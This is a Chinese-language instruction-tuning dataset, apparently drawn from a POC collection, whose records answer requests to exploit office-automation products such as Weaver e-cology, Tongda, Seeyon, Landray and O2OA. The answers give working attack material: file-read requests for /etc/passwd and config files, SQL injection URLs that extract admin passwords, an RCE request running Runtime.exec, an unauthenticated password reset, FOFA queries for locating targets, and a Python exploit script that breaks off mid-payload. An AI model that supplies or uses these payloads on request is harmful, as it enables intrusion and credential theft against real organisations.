  887. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:帆软报表 V8 任意文件读取漏洞 CNVD-2018-04757\n漏洞描述:FineReport报表软件是一款纯Java编写的,集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。 FineReport v8.0版本存在任意文件读取漏洞,攻击者可利用漏洞读取网站任意文件。\n影响版本:``` FineReport < v8.0 ```\n网络测绘:``` body=\"isSupportForgetPwd\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. FineReport < v8.0\n2. body=\"isSupportForgetPwd\"\n3. package com.fr.chart.web;\n\nimport com.fr.base.FRContext;\nimport com.fr.general.IOUtils;\nimport com.fr.stable.CodeUtils;\nimport com.fr.web.core.ActionNoSessionCMD;\nimport com.fr.web.utils.WebUtils;\nimport java.io.InputStream;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\n\npublic class ChartGetFileContentAction extends ActionNoSessionCMD {\n    public ChartGetFileContentAction() {\n    }\n\n    public void actionCMD(HttpServletRequest var1, HttpServletResponse var2, String var3) throws Exception {\n        String var4 = CodeUtils.cjkDecode(WebUtils.getHTTPRequestParameter(var1, \"resourcepath\"));\n        if (!WebUtils.invalidResourcePath(var4)) {\n            InputStream var5 = FRContext.getCurrentEnv().readResource(var4);\n            String var6 = IOUtils.inputStream2String(var5);\n            var6 = var6.replace('\\ufeff', ' ');\n            WebUtils.printAsString(var2, var6);\n        }\n    }\n\n    public String getCMD() {\n        return \"get_geo_json\";\n    }\n}\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/帆软报表 V8 任意文件读取漏洞 CNVD-2018-04757.md"}
    888. 

  888. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:蓝凌OA custom.jsp 任意文件读取漏洞\n漏洞描述:深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。\n影响版本:``` 蓝凌OA ```\n网络测绘:``` app=\"Landray-OA系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Landray-OA系统\"\n2. <%@page import=\"com.landray.kmss.util.ResourceUtil\"%>\n<%@page import=\"net.sf.json.JSONArray\"%>\n<%@page import=\"net.sf.json.JSONObject\"%>\n<%@ page language=\"java\" pageEncoding=\"UTF-8\"%>\n<%@ taglib prefix=\"c\" uri=\"http://java.sun.com/jsp/jstl/core\"%>\n<%\n JSONObject vara =\nJSONObject.fromObject(request.getParameter(\"var\"));\n JSONObject body = JSONObject.fromObject(vara.get(\"body\"));\n%>\n<c:import url='<%=body.getString(\"file\") %>'>\n <c:param name=\"var\" value=\"${ param['var'] }\"></c:param>\n</c:import>\n3. POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1\nHost:\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\nContent-Length: 42\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nvar={\"body\":{\"file\":\"file:///etc/passwd\"}}\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/蓝凌OA custom.jsp 任意文件读取漏洞.md"}
    889. 

  889. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740\n漏洞描述:O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。 O2OA系统invoke 接口存在远程代码执行漏洞。攻击者可利用漏洞执行任意代码。\n影响版本:``` O2OA ```\n网络测绘:``` title==\"O2OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title==\"O2OA\"\n2. var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n    var oneline = bufReader.readLine();\n    result.push(oneline);\n    if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\");\n3. POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1\nAuthorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA\n\n{\"id\":\"cmd\",\"name\":\"cmd\",\"enableToken\":false,\"alias\":\"\",\"description\":\"\",\"validated\":true,\"enable\":true,\"text\":\"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\\\"id\\\").getInputStream()));\\n\\nvar result = [];\\nwhile (true) {\\n    var oneline = bufReader.readLine();\\n    result.push(oneline);\\n    if (!oneline) break;\\n}\\nvar result = { \\\"Result\\\": result };\\nthis.response.setBody(result, \\\"application/json\\\"); \",\"remoteAddrRegex\":\"\",\"createTime\":\"2022-08-27 04:39:18\",\"updateTime\":\"2022-08-27 04:39:18\"}\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740.md"}
    890. 

  890. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA A6 config.jsp 敏感信息泄漏漏洞\n漏洞描述:致远OA A6 config.jsp页面可未授权访问,导致敏感信息泄漏漏洞,攻击者通过漏洞可以获取服务器中的敏感信息\n影响版本:``` 致远OA A6 ```\n网络测绘:``` body=\"yyoa\" && app=\"致远互联-OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. body=\"yyoa\" && app=\"致远互联-OA\"\n2. /yyoa/ext/trafaxserver/SystemManage/config.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA A6 config.jsp 敏感信息泄漏漏洞.md"}
    891. 

  891. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA v9 E-Cology browser.jsp SQL注入漏洞\n漏洞描述:泛微OA E-Cology browser.jsp 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息,进一步进行攻击\n影响版本:``` 泛微 E-Cology v9 ```\n网络测绘:``` product=\"泛微-协同商务系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微 E-Cology v9\n2. product=\"泛微-协同商务系统\"\n3. asdasdasxx%' union select 1,(select password from HrmResourceManager where id=1) union select 1,'1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md"}
    892. 

  892. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.6 print.php 任意文件删除&RCE\n漏洞描述:通过任意文件漏洞删除上传点包含的身份验证文件,从而造成未授权访问实现任意文件上传\n影响版本:``` 通达OA v11.6 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. <?php\n\ninclude_once \"inc/auth.inc.php\";\ninclude_once \"./utils.func.php\";\n$HTML_PAGE_TITLE = _(\"上传文件\");\ninclude_once \"inc/header.inc.php\";\n$error = \"\";\n$msg = \"\";\n\nif ($action == \"upload\") {\n\tif ($filetype == \"xls\") {\n\t\t$uploaddir = MYOA_ATTACH_PATH . \"/data_center/templates/\";\n\n\t\tif (!is_dir(MYOA_ATTACH_PATH . \"/data_center/templates\")) {\n\t\t\tif (!is_dir(MYOA_ATTACH_PATH . \"/data_center\")) {\n\t\t\t\tmkdir(MYOA_ATTACH_PATH . \"/data_center\");\n\t\t\t}\n\n\t\t\tmkdir(MYOA_ATTACH_PATH . \"/data_center/templates\");\n\t\t}\n\n\t\tif (move_uploaded_file($_FILES[\"FILE1\"][\"tmp_name\"], $uploaddir . $_FILES[\"FILE1\"][\"name\"])) {\n\t\t}\n\t}\n\telse if ($filetype == \"img\") {\n\t\t$uploaddir = MYOA_ATTACH_PATH . \"/data_center/images/\";\n\n\t\tif (!is_dir(MYOA_ATTACH_PATH . \"/data_center/images\")) {\n\t\t\tif (!is_dir(MYOA_ATTACH_PATH . \"/data_center\")) {\n\t\t\t\tmkdir(MYOA_ATTACH_PATH . \"/data_center\");\n\t\t\t}\n\n\t\t\tmkdir(MYOA_ATTACH_PATH . \"/data_center/images\");\n\t\t}\n\n\t\t$s_n = $_FILES[\"FILE1\"][\"name\"];\n\n\t\tif ($s_n[0] != \"{\") {\n\t\t\t$p = strrpos($s_n, \".\");\n\t\t\t$s_n = CreateId() . substr($s_n, $p);\n\t\t}\n\n\t\tif (move_uploaded_file($_FILES[\"FILE1\"][\"tmp_name\"], $uploaddir . $s_n)) {\n\t\t}\n\t}\n\telse {\n\t\t$uploaddir = MYOA_ATTACH_PATH . \"/data_center/attachment/\";\n\n\t\tif (!is_dir(MYOA_ATTACH_PATH . \"/data_center/attachment\")) {\n\t\t\tif (!is_dir(MYOA_ATTACH_PATH . \"/data_center\")) {\n\t\t\t\tmkdir(MYOA_ATTACH_PATH . \"/data_center\");\n\t\t\t}\n\n\t\t\tmkdir(MYOA_ATTACH_PATH . \"/data_center/attachment\");\n\t\t}\n\n\t\tif (isset($from_rep)) {\n\t\t\tif (($from_rep != \"\") && ($from_rep[0] == \"{\")) {\n\t\t\t\t$repkid = GetRepKIDBySendId($from_rep);\n\n\t\t\t\tif ($repkid != $to_rep) {\n\t\t\t\t\tif (file_exists($uploaddir . \"/\" . $repkid . \"_\" . $filename)) {\n\t\t\t\t\t\tcopy($uploaddir . \"/\" . $repkid . \"_\" . $filename, $uploaddir . \"/\" . $to_rep . \"_\" . $filename);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\telse {\n\t\t\t\t$arr = explode(\",\", $from_rep);\n\n\t\t\t\tfor ($i = 0; $i < count($arr); $i++) {\n\t\t\t\t\t$p = strpos($arr[$i], \".\");\n\t\t\t\t\t$repno = substr($arr[$i], 0, $p);\n\t\t\t\t\t$repkid = GetRepKIDByNo($repno);\n\n\t\t\t\t\tif ($repkid != $to_rep) {\n\t\t\t\t\t\tif (file_exists($uploaddir . \"/\" . $repkid . \"_\" . $filename)) {\n\t\t\t\t\t\t\tcopy($uploaddir . \"/\" . $repkid . \"_\" . $filename, $uploaddir . \"/\" . $to_rep . \"_\" . $filename);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\t$s_n = $_FILES[\"FILE1\"][\"name\"];\n\n\t\t\tif ($s_n[0] != \"{\") {\n\t\t\t\t$s_n = $repkid . \"_\" . $s_n;\n\t\t\t}\n\n\t\t\tif (move_uploaded_file($_FILES[\"FILE1\"][\"tmp_name\"], $uploaddir . $s_n)) {\n\t\t\t}\n\t\t}\n\t}\n\n\t@unlink($_FILES[\"FILE1\"]);\n}\nelse if ($action == \"unupload\") {\n\tif ($filetype == \"xls\") {\n\t\t$uploaddir = MYOA_ATTACH_PATH . \"data_center/attachment/\" . trim($filename) . \".xls\";\n\n\t\tif (is_file($uploaddir)) {\n\t\t\tunlink($uploaddir);\n\t\t}\n\t}\n\telse if ($filetype == \"img\") {\n\t\t$uploaddir = MYOA_ATTACH_PATH . \"data_center/images/\" . trim($filename);\n\n\t\tif (is_file($uploaddir)) {\n\t\t\tunlink($uploaddir);\n\t\t}\n\t}\n\telse if ($filetype == \"attach\") {\n\t\t$uploaddir = MYOA_ATTACH_PATH . \"data_center/attachment/\" . trim($filename);\n\n\t\tif (is_file($uploaddir)) {\n\t\t\tunlink($uploaddir);\n\t\t}\n\t}\n}\n\necho \"{\";\necho \"new_name:'$s_n',\\n\";\necho \"error: '\" . $error . \"',\\n\";\necho \"msg: '\" . $msg . \"'\\n\";\necho \"}\";\necho \"<body>\\r\\n</body>\\r\\n</html>\";\n\n?>\n2. include_once \"inc/auth.inc.php\";\n3. <?php\n\n$s_tmp = __DIR__ . \"/../../../../logs/appbuilder/logs\";\n$s_tmp .= \"/\" . $_GET[\"guid\"];\n\nif (file_exists($s_tmp)) {\n\t$arr_data = unserialize(file_get_contents($s_tmp));\n\tunlink($s_tmp);\n\t$s_user = $arr_data[\"user\"];\n}\nelse {\n\techo \"未知参数\";\n\texit();\n}\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.6 print.php 任意文件删除&RCE.md"}
    893. 

  893. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v2017 video_file.php 任意文件下载漏洞\n漏洞描述:通达OA v2017 video_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件\n影响版本:``` 通达OA v2017 ```\n网络测绘:``` app=\"TDXK-通达OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"TDXK-通达OA\"\n2. /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v2017 video_file.php 任意文件下载漏洞.md"}
    894. 

  894. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:新点OA ExcelExport 敏感信息泄露漏洞\n漏洞描述:新点OA 存在敏感信息泄露漏洞,访问特定的Url时可以获取所有用户的登录名信息,攻击者获取后可以进一步利用\n影响版本:``` 新点OA ```\n网络测绘:``` app=\"新点OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. /ExcelExport/人员列表.xls\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/新点OA ExcelExport 敏感信息泄露漏洞.md"}
    895. 

  895. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞\n漏洞描述:用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击\n影响版本:``` 用友 FE协作办公平台 ```\n网络测绘:``` \"FE协作\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 用友 FE协作办公平台\n2. /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞.md"}
    896. 

  896. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞\n漏洞描述:金蝶OA Apusic应用服务器(中间件) 存在任意文件读取漏洞,攻击者通过漏洞可以获取目录下的文件信息\n影响版本:``` 金蝶OA 9.0 Apusic应用服务器(中间件) ```\n网络测绘:``` app=\"Apusic-公司产品\" && title==\"欢迎使用Apusic应用服务器\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 金蝶OA 9.0 Apusic应用服务器(中间件)\n2. app=\"Apusic-公司产品\" && title==\"欢迎使用Apusic应用服务器\"\n3. /admin/protected/selector/server_file/files?folder=/\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞.md"}
    897. 

  897. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA V8 getdata.jsp SQL注入漏洞\n漏洞描述:泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限\n影响版本:``` 泛微OA V8 ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"泛微-协同办公OA\"\n2. http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager\n3. http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA getdata.jsp SQL注入漏洞.md"}
    898. 

  898. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202\n漏洞描述:泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。\n影响版本:``` 泛微e-cology 8.0 ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微e-cology 8.0\n2. app=\"泛微-协同办公OA\"\n3. /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202.md"}
    899. 

  899. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远 OA 未授权短信验证码绕过重置密码漏洞\n漏洞描述:致远互联专注于企业级管理软件领域,是一家集产品的设计、研发、销售及服务为一体高新技术企业。致远 Seeyon OA 存在短信验证码绕过重置密码漏洞,攻击者可以利用该漏洞修改任意用户密码。 参考链接: - https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=171\n影响版本:``` V5-G6、V8.1-SP2、V8.2 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. V5-G6、V8.1-SP2、V8.2\n2. POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\nContent-Length: 45\nConnection: close\n\n{\"loginName\":\"admin”,”password\":\"888888\"}\n3. - https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=171\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远 OA 未授权短信验证码绕过重置密码漏洞.md"}
    900. 

  900. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.2 upload.php 后台任意文件上传漏洞\n漏洞描述:通达OA v11.2后台存在文件上传漏洞,允许通过绕过黑名单的方法来上传恶意文件,导致服务器被攻击\n影响版本:``` 通达OA v11.2 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. [通达OA v11.2下载链接](https://cdndown.tongda2000.com/oa/2019/TDOA11.2.exe)\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.2 upload.php 后台任意文件上传漏洞.md"}
    901. 

  901. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.9 upsharestatus 后台SQL注入漏洞\n漏洞描述:通达OA v11.9 及以下版本中由于某些参数过滤不完善导致后台存在SQL注入漏洞\n影响版本:``` 通达OA <=  v11.9 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 通达OA <=  v11.9\n2. https://cdndown.tongda2000.com/oa/2019/TDOA11.9.exe\n3. public function actionUpsharestatus()\n\t{\n\t\tYii::$app->response->format = yii\\web\\Response::FORMAT_JSON;\n\t\t$data = modules\\appdesign\\models\\AppUtils::toGBK($_POST);\n\n\t\tif (modules\\portal\\controllers\\intval($data[\"uid\"]) == $_SESSION[\"LOGIN_UID\"]) {\n\t\t\tmodules\\portal\\models\\PortalWorkbench::updateAll(array(\"state\" => \"{$data[\"status\"]}\"), \"id={$data[\"id\"]}\");\n\t\t}\n\t\telse if ($data[\"status\"] == 1) {\n\t\t\tmodules\\portal\\models\\PortalWorkbenchState::deleteAll(array(\"wids\" => \"{$data[\"id\"]}\", \"uid\" => \"{$_SESSION[\"LOGIN_UID\"]}\"));\n\t\t}\n\t\telse {\n\t\t\t$Work = new modules\\portal\\models\\PortalWorkbenchState();\n\t\t\t$Work->wids = $data[\"id\"];\n\t\t\t$Work->uid = $_SESSION[\"LOGIN_UID\"];\n\t\t\t$Work->save();\n\t\t}\n\n\t\t$dataBack = array(\"status\" => 1, \"msg\" => modules\\portal\\controllers\\_(\"操作成功\"));\n\t\t$dataBack = modules\\appdesign\\models\\AppUtils::toUTF8($dataBack);\n\t\treturn $dataBack;\n\t}\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.9 upsharestatus 后台SQL注入漏洞.md"}
    902. 

  902. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA WorkflowCenterTreeData SQL注入漏洞\n漏洞描述:2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL注入攻击。\n影响版本:``` 使用Oracle数据库的泛微服务 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 使用Oracle数据库的泛微服务\n2. POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1\nHost: ip:port\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: ecology_JSessionId=abc49y8JvMcoqhSkCv02w; testBanCookie=test\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 2236\nUpgrade-Insecure-Requests: 1\n\nformids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1\n3. import requests\nimport sys\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',\n    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n    'Accept-Language': 'zh-CN,zh;q=0.9',\n    'Content-Type': 'application/x-www-form-urlencoded'\n}\n\ndef exploit(url):\n    target=url+'/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333'\n    payload=\"formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0